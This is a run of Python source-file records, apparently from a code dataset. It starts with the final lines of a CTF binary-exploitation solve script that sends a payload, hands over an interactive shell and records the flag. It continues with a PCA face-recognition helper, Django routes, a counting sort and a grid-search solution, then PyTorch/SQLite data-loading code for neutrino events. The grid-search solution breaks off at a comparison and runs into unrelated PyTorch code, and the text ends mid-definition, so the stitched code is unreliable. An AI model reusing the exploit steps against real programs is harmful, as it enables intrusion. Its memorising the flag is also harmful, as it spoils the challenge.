name?\\n\")\ntime.sleep(1)\nio.sendline(payload)\n# io.recvuntil(b'CTF 2020!\\n')\n\ntime.sleep(1)\nio.sendline(buf)\n\nio.interactive()\n\n# zer0pts{welcome_yokoso_osooseyo_huanying_dobropozhalovat}\n","sub_path":"zer0ptsctf2020/hipwn/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"206363745","text":"import numpy as np\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nimport random\nimport itertools\n\n\n# Compute number of images per person (assuming each face has same num of images)\ndef images_per_person(results):\n images_per_face = 0\n image_count = 0\n while images_per_face == 0:\n if results[image_count] == results[image_count + 1]:\n image_count += 1\n else:\n images_per_face = image_count + 1\n return images_per_face\n\n\n# Compute number of distinct faces in the data\ndef distinct_faces_num(total_faces_num, images_per_face):\n if total_faces_num % images_per_face != 0:\n raise ValueError(\"Have different number of image per face\")\n else:\n return int(total_faces_num / images_per_face)\n\n\n# Split training samples and test samples\ndef split_train_test(total_faces_num,\n test_image_per_face,\n images_per_face,\n num_of_distinct_faces,\n resolutions,\n faces,\n results):\n\n # Calculating the number of images, setting up for the training and test sample split\n train_image_per_face = images_per_face - test_image_per_face\n\n num_of_train_faces = train_image_per_face * num_of_distinct_faces\n num_of_test_faces = test_image_per_face * num_of_distinct_faces\n\n test_ratio = num_of_test_faces / total_faces_num\n\n faces_train = np.zeros((resolutions, num_of_train_faces))\n faces_test = np.zeros((resolutions, num_of_test_faces))\n results_train = np.zeros(num_of_train_faces)\n results_test = np.zeros(num_of_test_faces)\n\n # Split 
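fold() above delegates the actual binning to lib.foldTim in C. For orientation, this is the textbook phase-folding rule it applies: a pure-numpy sketch of the zero-acceleration case, not the exact library implementation.

import numpy as np

def fold_profile(tim, tsamp, period, nbins=50):
    t = np.arange(tim.size) * tsamp                     # sample times in seconds
    phase_bin = ((t / period) % 1 * nbins).astype(int)  # phase in [0, 1) -> bin index
    prof = np.bincount(phase_bin, weights=tim, minlength=nbins)
    counts = np.bincount(phase_bin, minlength=nbins)
    return prof / np.maximum(counts, 1)                 # mean intensity per phase bin

profile = fold_profile(np.random.randn(4096), tsamp=6.4e-5, period=0.033)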
training samples and test samples\n for i in range(0, num_of_distinct_faces):\n state = random.randint(1, 100)\n start = i * images_per_face\n end = start + images_per_face\n single_face_arr = faces[:, start: end]\n single_face_result = results[start: end]\n faces_train_temp, faces_test_temp, results_train_temp, results_test_temp = train_test_split(single_face_arr.transpose(),\n single_face_result,\n test_size=test_ratio,\n random_state=state)\n start_train = start if start == 0 else start - test_image_per_face * i\n end_train = end - test_image_per_face * (i + 1)\n start_test = start if start == 0 else start - train_image_per_face * i\n end_test = end - train_image_per_face * (i + 1)\n faces_train[:, start_train: end_train] = faces_train_temp.transpose()\n faces_test[:, start_test: end_test] = faces_test_temp.transpose()\n results_train[start_train: end_train] = results_train_temp\n results_test[start_test: end_test] = results_test_temp\n\n return num_of_train_faces, num_of_test_faces, faces_train, faces_test, results_train, results_test\n\n\ndef normalization(vector):\n norm = np.linalg.norm(vector)\n vector /= norm\n\n\ndef print_image(image):\n # Rescale average training vector to gray scale matrix\n image_to_print = image.reshape(46, 56)\n\n # Show image\n image_to_print = image_to_print.T\n plt.imshow(image_to_print, cmap='gist_gray')\n plt.show()\n\n\ndef sample_reconstruction(num_of_faces, projections, resolutions, best_eigen_vectors, face_avg, M):\n train_faces_reconstructed = np.zeros((resolutions, num_of_faces), dtype=np.complex)\n\n # Reconstruct training faces as linear combination of the best M eigen vectors\n for i in range(0, projections.shape[0]):\n linear_combination_of_eigen_vectors = np.zeros((resolutions, 1), dtype=np.complex)\n for j in range(0, M):\n projection = projections[i][j]\n eigen_vector = best_eigen_vectors[j].reshape(resolutions, 1)\n linear_combination_of_eigen_vectors += eigen_vector * projection\n train_faces_reconstructed[:, i] = (face_avg + linear_combination_of_eigen_vectors).squeeze()\n\n return train_faces_reconstructed\n\n\ndef false_correct_image(results, test_results, test_samples, pca, is_lda=False):\n temp = results - test_results\n count = 0\n for i in range(len(temp)):\n if is_lda is False:\n if temp[i] == 0:\n plt.subplot(421 + count * 2)\n plt.title('Correct')\n image = test_samples[:, i].reshape(46, 56).T\n plt.imshow(image, cmap='gist_gray')\n plt.subplot(421 + count * 2 + 1)\n plt.title('Projected')\n image = pca.test_sample_reconstructed[:, i].real.reshape(46, 56).T\n plt.imshow(image, cmap='gist_gray')\n count += 1\n else:\n if temp[i] == 0:\n plt.subplot(221 + count)\n plt.title('Correct')\n image = test_samples[:, i].reshape(46, 56).T\n plt.imshow(image, cmap='gist_gray')\n count += 1\n if count == 2:\n break\n for i in range(len(temp)):\n if is_lda is False:\n if temp[i] != 0:\n plt.subplot(421 + count * 2)\n plt.title('Incorrect')\n image = test_samples[:, i].reshape(46, 56).T\n plt.imshow(image, cmap='gist_gray')\n plt.subplot(421 + count * 2 + 1)\n plt.title('Projected')\n image = pca.test_sample_reconstructed[:, i].real.reshape(46, 56).T\n plt.imshow(image, cmap='gist_gray')\n count += 1\n else:\n if temp[i] != 0:\n plt.subplot(221 + count)\n plt.title('Incorrect')\n image = test_samples[:, i].reshape(46, 56).T\n plt.imshow(image, cmap='gist_gray')\n count += 1\n if count == 4:\n break\n plt.show()\n\n\ndef image_comparison(pca):\n first_reconstructed_image = pca.test_sample_reconstructed[:, 0].real.reshape(46, 56).T\n 
second_reconstructed_image = pca.test_sample_reconstructed[:, 1].real.reshape(46, 56).T\n third_reconstructed_image = pca.test_sample_reconstructed[:, 2].real.reshape(46, 56).T\n first_test_image = pca.test_sample[:, 0].reshape(46, 56).T\n second_test_image = pca.test_sample[:, 1].reshape(46, 56).T\n third_test_image = pca.test_sample[:, 2].reshape(46, 56).T\n\n plt.subplot(321)\n plt.title('Actual')\n plt.imshow(first_test_image, cmap='gist_gray')\n plt.subplot(323)\n plt.imshow(second_test_image, cmap='gist_gray')\n plt.subplot(325)\n plt.imshow(third_test_image, cmap='gist_gray')\n plt.subplot(322)\n plt.title('Reconstructed')\n plt.imshow(first_reconstructed_image, cmap='gist_gray')\n plt.subplot(324)\n plt.imshow(second_reconstructed_image, cmap='gist_gray')\n plt.subplot(326)\n plt.imshow(third_reconstructed_image, cmap='gist_gray')\n plt.show()\n\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title + '\\n', fontsize=50)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.ylabel('True label', fontsize=50)\n plt.xlabel('Predicted label', fontsize=50)\n plt.tight_layout()\n\n\ndef plot_eig_values(eig_values):\n y = eig_values[0:415].tolist()\n y.sort(reverse=True)\n x = range(len(y))\n plt.figure()\n plt.bar(x, y, 1)\n plt.xlabel(r'$\\lambda_i: i^{th}$' + ' eigenvalue')\n plt.ylabel('Real value')\n plt.title(r'$N_{train} - 1$' + ' Eigenvalues of $S_c$')\n\n plt.show()\n","sub_path":"image_data_processor.py","file_name":"image_data_processor.py","file_ext":"py","file_size_in_byte":8549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"490068383","text":"from django.urls import path\nfrom . 
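sample_reconstruction() above rebuilds each sample as the average face plus a weighted sum of the best M eigenvectors; the double loop can be stated in one vectorized expression. A runnable sketch whose shapes follow the function's arguments (2576 = 46*56):

import numpy as np

def reconstruct(projections, eigen_vectors, face_avg):
    # projections: (n_samples, M), eigen_vectors: (M, resolutions), face_avg: (resolutions,)
    return (face_avg[None, :] + projections @ eigen_vectors).T   # (resolutions, n_samples)

rng = np.random.default_rng(0)
out = reconstruct(rng.normal(size=(3, 5)), rng.normal(size=(5, 2576)), np.zeros(2576))
print(out.shape)  # (2576, 3)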
import views\n\napp_name = 'sample'\n\nurlpatterns = [\n    path('chartjs/', views.chart_js, name='chart_js'),\n    path('chartSample/', views.chart_sample, name='chart_sample'),\n    path('apiopen/', views.api_open, name='api_open'),\n    path('oraconn/', views.ora_conn, name='ora_conn'),\n    path('sqlexec/', views.sql_exec, name='sql_exec'),\n    path('imageocr/', views.image_ocr, name='image_ocr'),\n    path('emailsend/', views.email_send, name='email_send'),\n    path('pandas/', views.pandas_sample, name='pandas_sample'),\n]","sub_path":"sample/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"446963387","text":"\n\ndef counting_sort(collection):\n    \"\"\"\n    # cannot sort negative numbers\n    coll_len = len(collection)\n    coll_min = min(collection)\n    coll_max = max(collection)\n\n    coll_len_arr = coll_max - coll_min + 1\n    count_arr = [0] * coll_len_arr\n\n    for i in collection:\n        count_arr[i] = count_arr[i] + 1\n\n    index = 0\n    coll_sorted = [0] * coll_len\n    for i in range(coll_max + 1):\n        for j in range(count_arr[i]):\n            coll_sorted[index] = i\n            index += 1\n\n    return sorted\n    \"\"\"\n    coll_len = len(collection)\n    coll_min = min(collection)\n    coll_max = max(collection)\n\n    coll_len_arr = coll_max - coll_min + 1\n    count_arr = [0] * coll_len_arr\n\n    for number in range(coll_len):\n        count_arr[collection[number] - coll_min] += 1\n\n    for i in range(1, len(count_arr)):\n        count_arr[i] = count_arr[i] + count_arr[i - 1]\n\n    sorted_arr = [0] * coll_len\n    for i in range(coll_len):\n        sorted_arr[count_arr[collection[i] - coll_min] - 1] = collection[i]\n        count_arr[collection[i] - coll_min] -= 1\n\n    return sorted_arr\n\n\ndef string_counting_sort(string):\n    return ''.join([chr(i) for i in counting_sort([ord(c) for c in string])])\n\n\nif __name__ == \"__main__\":\n\n    assert \"eghhiiinrsssttt\" == string_counting_sort(\"thisisthestring\")\n    user_input = input(\"enter numbers separated by a comma:\\n\").strip()\n    unsorted = [int(tmp) for tmp in user_input.split(',')]\n    print(counting_sort(unsorted))\n","sub_path":"TheAlgorithms/Sorts/counting_sort.py","file_name":"counting_sort.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"212893240","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 12 20:40:20 2018\n\n@author: owen\n\"\"\"\n\n# https://leetcode.com/problems/contain-virus/solution/\nclass Solution:\n    def containVirus(self, grid):\n        \"\"\"\n        :type grid: List[List[int]]\n        :rtype: int\n        \"\"\"\n        m,n=len(grid),len(grid[0])\n        \n        def neighbors(r,c):\n            for nr,nc in ((r-1,c),(r,c-1),(r+1,c),(r,c+1)):\n                if 0<=nr<m and 0<=nc<n:\n                    yield nr, nc\n        # i1 = torch.where(targets[:, 0]>0.5)[0]\n        # i2 = torch.where(targets[:, 0]<0.5)[0]\n        # scalars1 = scalar_vars[i1].numpy()\n        # scalars2 = scalar_vars[i2].numpy()\n        # # plot it\n        # d = {\n        #     'data': [scalars1, scalars2],\n        #     'density': [True, True],\n        #     'calc_bin_width': True,\n        #     'savefig': get_project_root() + '/scalars.png'\n        # }\n        # _ = make_plot(d)\n        # # print(i1, i2)\n        # l1 = lengths[i1]\n        # l2 = lengths[i2]\n        # # print('l1', l1)\n        # # print('l2', l2)\n        # s1 = sequences_padded[i1, :, :]\n        # s2 = sequences_padded[i2, :, :]\n        # # print(s1.shape[-1])\n        # for i_seq in range(s1.shape[-1]):\n        #     f1 = np.array([])\n        #     for i_batch in range(s1.shape[0]):\n        #         length = l1[i_batch]\n        #         # feat = s1[i_batch, l1[:length], i_seq].numpy()\n        #         f1 = np.append(f1, s1[i_batch, :length, i_seq].numpy())\n            \n        #     f2 = np.array([])\n        #     for i_batch in 
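A worked trace of the min-offset trick in counting_sort() above, on the input [4, -2, 0, 4]:

# coll_min = -2, so a value v is counted at index v - (-2); values span -2..4
#   counts      -> [1, 0, 1, 0, 0, 0, 2]
#   prefix sums -> [1, 1, 2, 2, 2, 2, 4]   (one past the last slot of each value)
# placing each collection[i] at position count-1 and decrementing gives:
print(counting_sort([4, -2, 0, 4]))  # [-2, 0, 4, 4]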
range(s2.shape[0]):\n # length = l2[i_batch]\n # # feat = s1[i_batch, l1[:length], i_seq].numpy()\n # f2 = np.append(f2, s2[i_batch, :length, i_seq].numpy())\n\n # # plot it\n # d = {\n # 'data': [f1, f2],\n # 'density': [True, True],\n # 'calc_bin_width': True,\n # 'savefig': get_project_root() + '/' + str(i_seq) + '.png'\n # }\n # _ = make_plot(d)\n # a+=1\n # DEBUGGING FINISHED \n return pack, (targets.float(), weights.float())\n\n def _permute(self, seqs, scalars, lengths):\n # For the sequential features, there are sum(lengths) variables to draw from (if we only permute in batch)\n # draw randomly with \n # Loop over indices of features to permute\n for index in self._permute_seq_features:\n\n # Make a scrambled bag of features\n entries = np.array([])\n for entry in seqs:\n entries = np.append(entries, entry[:, index].numpy()) \n \n # Generate a random sample with replacement for each sequence\n for i_seq, length in enumerate(lengths):\n seqs[i_seq][:, index] = torch.tensor(np.random.choice(entries, length))\n \n # Now do the same for scalar vars\n batch_size = scalars.shape[0]\n for index in self._permute_scalar_features:\n # Convert to numpy, retrieve a random sample, convert back to tensor\n scalars[:, index] = torch.tensor(np.random.choice(scalars[:, index].numpy(), batch_size))\n\n return seqs, scalars\n \n def _permute_seq(self, seqs): \n \n # Make a copy to ensure all sampling is from same distribution\n seqs_permuted = [seq.clone().detach()+0.0 for seq in seqs]\n n_seqs = len(seqs)\n seq_lengths = np.array([len(x) for x in seqs])\n for i_seq in range(n_seqs):\n # seq.shape = [seqlen, n_feats]\n # Find DOMs to change\n seqlen = seq_lengths[i_seq]\n if seqlen > 10:\n continue\n start = int(self._from_frac*seqlen + 0.5) # add half due to rounding\n end = int(self._to_frac*seqlen + 0.5) # add half due to rounding\n indices = np.arange(start, end)\n\n # Find which sequence (N) to pick DOM (frac)\n which_seq = np.random.randint(0, high=n_seqs, size=(len(indices),))\n which_dom = np.random.uniform(size=len(which_seq))*seq_lengths[which_seq]\n which_dom = which_dom.astype(int)\n\n # Insert copy\n before = seqs_permuted[i_seq].clone().detach()\n for index, seq_id, dom_id in zip(indices, which_seq, which_dom):\n seqs_permuted[i_seq][index, :] = seqs[seq_id][dom_id, :].clone().detach()\n\n return seqs_permuted\n\nclass SqliteFetcher:\n\n def __init__(self, db_path):\n\n self._path = str(db_path)\n self._tables = None\n self._len = None\n self._rows = None\n self._event_lengths_key = 'split_in_ice_pulses_event_length' \n self._max_events_per_query = 50000\n # self._fetch_query_seq = 'SELECT {features} FROM {table} WHERE event '\\\n\n self._fetch_query_seq = 'SELECT {features} FROM {table} WHERE event_no '\\\n 'IN ({events})'\n self._fetch_query = 'SELECT {features} FROM {table} WHERE event_no '\\\n 'IN ({events})'\n self._read_query = (\n 'SELECT {feature} FROM {table} WHERE {primary_key} IN ({nums})'\n )\n\n def __len__(self):\n return self._len\n \n @property\n def ids(self):\n \n with sqlite3.connect(self._path) as db:\n cursor = db.cursor()\n query = 'SELECT event_no FROM meta'\n cursor.execute(query)\n\n event_ids = [str(e[0]) for e in cursor.fetchall()]\n\n return event_ids\n \n @property\n def rows(self):\n \n with sqlite3.connect(self._path) as db:\n cursor = db.cursor()\n query = 'SELECT row FROM sequential'\n cursor.execute(query)\n\n rows = sorted([str(e[0]) for e in cursor.fetchall()])\n\n return rows\n\n @property\n def length(self):\n \n if not self._len:\n \n with 
sqlite3.connect(self._path) as db:\n cursor = db.cursor()\n query = 'SELECT event_no FROM meta'\n cursor.execute(query)\n\n event_nums = [e[0] for e in cursor.fetchall()]\n self._len = len(event_nums)\n \n return self._len\n \n @property\n def n_rows(self):\n \n if not self._rows:\n \n with sqlite3.connect(self._path) as db:\n cursor = db.cursor()\n query = 'SELECT COUNT(*) FROM sequential'\n cursor.execute(query)\n\n row_nums = cursor.fetchall()\n self._rows = row_nums[0][0]\n \n return self._rows\n \n @property\n def tables(self):\n\n if not self._tables:\n\n with sqlite3.connect(self._path) as db:\n cursor = db.cursor()\n\n # Get table-names\n query = 'SELECT name FROM sqlite_master WHERE type = \"table\"'\n cursor.execute(query)\n tables_data = {entry[0]: {} for entry in cursor.fetchall()}\n\n # Loop over all columns and fetch their info\n for name in tables_data:\n query = 'PRAGMA TABLE_INFO({tablename})'.format(\n tablename=name\n ) \n\n cursor.execute(query)\n col_data = cursor.fetchall()\n \n tables_data[name] = {e[1]: {\n 'type': e[2], \n 'index': e[0],\n }\n for e in col_data\n }\n \n self._tables = tables_data\n \n return self._tables\n \n def _fetch( self, ids, *queries):\n\n fetched = ()\n with sqlite3.connect(self._path) as db:\n for query in queries:\n cursor = db.cursor()\n cursor.execute(query, ids)\n fetched = fetched + (cursor.fetchall(),)\n\n return fetched\n\n def _make_dict(\n self, \n events, \n names_scalar, \n fetched_scalar,\n names_sequential, \n fetched_sequential,\n names_meta, \n fetched_meta,\n event_lengths\n ):\n \n # get the from- and to-indices of each event.\n cumsum = np.append([0], np.cumsum([entry[0] for entry in event_lengths]))\n all_from = cumsum[:-1]\n all_to = cumsum[1:]\n\n # Create dictionary. First level is event\n data_dict = {}\n for i_event, event in enumerate(events):\n \n # Second level is data\n data_dict[event] = {}\n\n # order the data from fetched_scalar\n from_, to_ = all_from[i_event], all_to[i_event]\n for i_name, name in enumerate(names_sequential):\n data = [\n entry[i_name] for entry in fetched_sequential[from_:to_]\n ]\n data_dict[event][name] = np.array(data)\n\n # Do the same for scalar data\n for i_name, name in enumerate(names_scalar):\n data_dict[event][name] = fetched_scalar[i_event][i_name]\n \n # .. 
And finally meta\n for i_name, name in enumerate(names_meta):\n data_dict[event][name] = fetched_meta[i_event][i_name]\n \n return data_dict\n\n def fetch_features(\n self,\n all_events=[],\n scalar_features=[],\n seq_features=[],\n meta_features=[],\n reg_type=None\n ):\n \n # Connect to DB and set cursor\n with sqlite3.connect(self._path) as db:\n cursor = db.cursor()\n n_events = len(all_events)\n # Ensure some events are passed\n if n_events == 0:\n raise ValueError('NO EVENTS PASSED TO SQLFETCHER')\n\n # If events are not strings, raise error\n if not isinstance(all_events[0], str):\n raise ValueError('SqliteFetcher: IDs must be strings!')\n\n if 'event_no' in scalar_features or 'event_no' in meta_features:\n raise KeyError('event_no cannot be requested!')\n\n # load over several rounds\n n_chunks = n_events//self._max_events_per_query\n chunks = np.array_split(all_events, max(1, n_chunks))\n\n base_query = 'SELECT {features} FROM {table} WHERE event_no '\\\n 'IN ({events})'\n base_seq_query = 'SELECT {features} FROM {table} WHERE event '\\\n 'IN ({events})'\n \n fetched_scalar, fetched_sequential, fetched_meta = [], [], []\n \n # Process chunks\n all_dicted_data = {}\n for events in chunks:\n # Write query for scalar table and fetch all matching rows\n if len(scalar_features) > 0:\n query = base_query.format(\n features=', '.join(scalar_features),\n table='scalar',\n events=', '.join(['?'] * len(events))\n )\n\n cursor.execute(query, events)\n fetched_scalar = cursor.fetchall()\n\n # Write query for sequential table and fetch all matching rows\n if len(seq_features)>0:\n query = base_seq_query.format(\n features=', '.join(seq_features),\n table='sequential',\n events=', '.join(['?'] * len(events))\n )\n\n cursor.execute(query, events)\n fetched_sequential = cursor.fetchall()\n \n # Write query for meta table and fetch all matching rows\n if len(meta_features)>0:\n query = base_query.format(\n features=', '.join(meta_features),\n table='meta',\n events=', '.join(['?'] * len(events))\n )\n cursor.execute(query, events)\n fetched_meta = cursor.fetchall()\n\n # Finally, fetch event lengths as they are needed for making \n # sequential dictionary\n query = base_query.format(\n features=self._event_lengths_key,\n table='meta',\n events=', '.join(['?'] * len(events))\n )\n cursor.execute(query, events)\n event_lengths = cursor.fetchall()\n\n # Put in a dictionary and update all_dicted_ata\n dicted_data = self._make_dict(\n events, scalar_features, fetched_scalar, seq_features,\n fetched_sequential, meta_features, fetched_meta, event_lengths\n )\n all_dicted_data.update(dicted_data)\n \n return all_dicted_data\n\n def make_batch(\n self,\n ids=[],\n scalars=[],\n seqs=[],\n targets=[],\n weights=[],\n mask=[],\n reg_type=None\n ):\n \n n_events = len(ids)\n # Ensure some events are passed\n if n_events == 0:\n raise ValueError('NO EVENTS PASSED TO SQLFETCHER')\n\n # If events are not strings, convert them\n if not isinstance(ids[0], str):\n raise ValueError('Events must be IDs as strings')\n \n if weights == []:\n NO_WEIGHTS = True\n else:\n NO_WEIGHTS = False\n\n # Prepare single-number queries\n scalar_cols = ['scalar.'+e for e in scalars]\n if reg_type in CLASSIFICATION:\n target_cols = ['meta.particle_code']\n else:\n target_cols = ['scalar.'+e for e in targets]\n\n lengths_key = ['meta.split_in_ice_pulses_event_length']\n weights_col = ['scalar.'+e for e in weights]\n\n all_single_val_feats = scalar_cols+target_cols+weights_col+lengths_key\n singles_query = 'SELECT {features} FROM 
scalar INNER JOIN meta ON scalar.event_no=meta.event_no WHERE scalar.event_no IN ({events})'.format(\n features=', '.join(all_single_val_feats),\n events=', '.join(['?'] * n_events)\n )\n \n # Prepare sequences-query\n all_seq_cols_feats = seqs+mask\n seq_query = 'SELECT {features} FROM sequential WHERE event_no IN ({events})'.format(\n features=', '.join(all_seq_cols_feats),\n events=', '.join(['?'] * n_events)\n )\n\n # Make fetch\n singles, sequences = self._fetch(ids, singles_query, seq_query)\n\n # prepare the batch\n batch = [()]*n_events\n\n # get the from- and to-indices of each event.\n lengths = np.array(\n [\n entry[-1] for entry in singles\n ]\n )\n cumsum = np.append([0], np.cumsum(lengths))\n all_from = cumsum[:-1]\n all_to = cumsum[1:]\n \n n_scalars = len(scalars)\n n_targets = len(target_cols)\n n_seqs = len(seqs)\n for i_event in range(n_events):\n \n # Make scalar, weights and target arrays. Weights is always \n # second \n scalar_arr = np.array(singles[i_event][:n_scalars])\n\n # Handle classification differently \n # - we manually convert particle code to a one-hot encoding\n if reg_type in CLASSIFICATION:\n particle_code = singles[i_event][n_scalars:n_scalars+n_targets][0]\n if reg_type == 'nue_numu':\n if particle_code == 120000:\n target_arr = np.array([1.0, 0.0])\n elif particle_code == 140000:\n target_arr = np.array([0.0, 1.0])\n elif reg_type == 'nue_numu_nutau':\n if particle_code == 120000:\n target_arr = np.array([1.0, 0.0, 0.0])\n elif particle_code == 140000:\n target_arr = np.array([0.0, 1.0, 0.0])\n else:\n target_arr = np.array([0.0, 0.0, 1.0])\n else:\n raise ValueError('Unknown classification encountered')\n else:\n target_arr = np.array(\n singles[i_event][n_scalars:n_scalars+n_targets]\n )\n \n if NO_WEIGHTS:\n weight = 1.0\n else:\n weight = singles[i_event][-2]\n \n # Make sequential array\n # Since each DOM is stored as a row, we first get the to- and \n # from-rows that combine to an event\n from_, to_ = all_from[i_event], all_to[i_event]\n # We then create our mask - a Boolean array saying whether a \n # DOM is included or not\n masked_indices = np.array([e[-1] for e in sequences[from_:to_]], dtype=bool)\n n_doms = np.sum(masked_indices)\n # Now loop over variables and extract them\n seq_arr = np.zeros((n_seqs, n_doms))\n for i_var in range(n_seqs):\n seq_arr[i_var, :] = np.array(\n [\n dom[i_var] for dom in sequences[from_:to_]\n ]\n )[masked_indices]\n\n # Add to list of events\n batch[i_event] = (seq_arr, scalar_arr, target_arr, weight)\n\n return batch\n\n def read(self, table, feature, primary_key, nums):\n # If events are not strings, convert them\n if not isinstance(nums[0], str):\n raise ValueError('Events must be IDs as strings')\n with sqlite3.connect(self._path) as db:\n cursor = db.cursor()\n query = self._read_query.format(\n # feature=', '.join([feature, primary_key]),\n feature=feature,\n table=table,\n primary_key=primary_key,\n nums=', '.join(['?'] * len(nums))\n )\n \n cursor.execute(query, nums)\n fetched = cursor.fetchall()\n converted = np.array([\n e[0] for e in fetched\n ])\n # ids = np.array([\n # e[1] for e in fetched\n # ])\n return converted#, ids\n \n def write(\n self, table, name, ids, values, primary_key='event_no', astype='REAL'\n ):\n\n n_events = len(ids)\n n_values = len(values)\n \n # Ensure some events are passed\n if n_events == 0:\n raise ValueError('NO EVENTS PASSED TO SQLFETCHER')\n \n # Ensure a matching amount of values and IDs are passed\n if n_events != n_values:\n raise ValueError('Number of IDs (%d) 
and values (%d) does not match'\n %(n_events, n_values))\n\n # If events are not strings, convert them\n if not isinstance(ids[0], str):\n raise ValueError('Events must be IDs as strings')\n \n with sqlite3.connect(self._path) as db:\n cursor = db.cursor()\n\n # Check if column exists - if not, create it.\n if not name in self.tables[table]:\n query = 'ALTER TABLE {table} ADD COLUMN {name} {astype}'.format(\n table=table,\n name=name,\n astype=astype\n )\n cursor.execute(query)\n \n # Write data to column\n query = 'UPDATE {table} SET {name}=? WHERE {primary_key}=?'.format(\n table=table,\n name=name,\n primary_key=primary_key\n )\n cursor.executemany(query, [[e[0], e[1]] for e in zip(values, ids)])\n db.commit()\n\n\nclass SqliteLoader(data.Dataset):\n '''A Pytorch dataloader for neural nets with sequential and scalar variables. This dataloader does not load data into memory, but opens a h5-file, reads and closes the file again upon every __getitem__.\n\n Input: Directory to loop over, targetnames, scalar feature names, sequential feature names, type of set (train, val or test), train-, test- and validation-fractions and an optional datapoints_wanted.\n '''\n def __init__(\n self, \n directory, \n seq_features, \n scalar_features, \n targets, \n masks=['all'], \n n_events_wanted=np.inf, \n weights='None', \n dom_mask='SplitInIcePulses', \n max_seq_len=np.inf, \n keyword=None, \n batch_size=None,\n ensemble=[],\n db_path=None,\n reg_type=None\n ):\n if batch_size == None:\n raise ValueError('A batchsize must be specified!')\n if db_path == None:\n raise ValueError('A DB must be supplied!')\n\n self.directory = get_project_root() + directory\n\n self.scalar_features = scalar_features\n self.seq_features = seq_features\n self.targets = targets\n self.keyword = keyword\n self.reg_type = reg_type\n\n self.n_scalar_features = len(scalar_features)\n self.n_seq_features = len(seq_features)\n self.n_targets = len(targets)\n\n self.masks = masks\n self.n_events_wanted = n_events_wanted\n self.max_seq_len = max_seq_len\n self.batch_size = batch_size\n self.db_path = db_path\n self.db = SqliteFetcher(db_path)\n\n # ! Another method used: right now predictions saved in DB.\n # self.ensemble, self.ensemble_inputs = self._load_ensemble(ensemble)\n\n # 'SplitInIcePulses' corresponds to all DOMs\n # 'SRTInIcePulses' corresponds to Icecubes cleaned doms\n self.dom_mask = [dom_mask]\n self.keyword = keyword\n self.weights = [weights] if weights != 'None' else [] # To be determined in get_meta_information\n self.len = None # To be determined in get_meta_information\n self.indices = None # To be determined in get_meta_information\n\n self._get_meta_information()\n if keyword != 'predict':\n self.shuffle_indices()\n\n def __getitem__(self, index):\n from_, to_ = index*self.batch_size, (index+1)*self.batch_size\n ids = [str(entry) for entry in self.indices[from_:to_]]\n \n # Load batch - gets list back with tuples \n # (seq_arr, scalar_arr, target_arr). Add weights afterwards.\n batch = self.db.make_batch(\n ids=ids, \n scalars=self.scalar_features, \n seqs=self.seq_features, \n targets=self.targets,\n weights=self.weights, \n mask=self.dom_mask,\n reg_type=self.reg_type\n )\n \n # Tuple is now passed to collate_fn - handle training and predicting\n # differently. 
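`write` relies on two SQLite idioms: a one-off `ALTER TABLE ... ADD COLUMN` when the target column does not exist yet, and `executemany` over value/id pairs for the bulk update. A throwaway in-memory sketch of the same pattern (table, column, and values are illustrative, not the project's schema):

```python
import sqlite3

with sqlite3.connect(':memory:') as db:
    cursor = db.cursor()
    cursor.execute('CREATE TABLE scalar (event_no TEXT PRIMARY KEY)')
    cursor.executemany('INSERT INTO scalar VALUES (?)', [('1',), ('2',)])

    # Add the column once, then bulk-write (value, id) pairs.
    cursor.execute('ALTER TABLE scalar ADD COLUMN energy_pred REAL')
    cursor.executemany('UPDATE scalar SET energy_pred=? WHERE event_no=?',
                       [(0.5, '1'), (1.5, '2')])
    db.commit()
    print(cursor.execute('SELECT * FROM scalar').fetchall())
    # [('1', 0.5), ('2', 1.5)]
```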
We need the name of the event for prediction to log\n # which belongs to which\n if self.keyword == 'predict':\n pack = [\n e+(self.keyword, int(ids[i_event])) for i_event, e in enumerate(batch)\n ]\n\n else:\n pack = [\n e+(self.keyword, ) for i_event, e in enumerate(batch)\n ]\n \n return pack\n\n def __len__(self):\n return self.len\n\n def __repr__(self):\n return 'SqliteLoader'\n\n def _get_meta_information(self):\n '''Extracts filenames, calculates indices induced by train-, val.- and test_frac\n '''\n\n # Get mask\n if self.db_path == PATH_TRAIN_DB:\n _keyword = 'train'\n elif self.db_path == PATH_VAL_DB:\n _keyword = 'val'\n \n self.indices = np.array(\n load_sqlite_mask(\n self.directory, self.masks, _keyword\n )\n )\n \n # If training, only use full batches.\n if self.keyword == 'train':\n self.len = min(\n self.n_events_wanted, len(self.indices)\n )//self.batch_size\n # If not, predict on everything \n else:\n self.len = int(\n np.ceil(\n min(\n self.n_events_wanted, len(self.indices)\n )/self.batch_size\n )\n ) \n \n def _load_ensemble(self, ensemble):\n # Load ensemble (if given)\n models = []\n \n for entry in ensemble:\n member = {}\n path = locate_model(entry)\n member['model'] = load_best_model(path)\n member['seq_feat'], member['scalar_feat'] = find_model_input_vars(path)\n models.append(member)\n print(member)\n \n return models\n\n def shuffle_indices(self):\n random.shuffle(self.indices)\n\n#* ======================================================================== \n#* DATALOADER FUNCTIONS\n#* ========================================================================\n\ndef 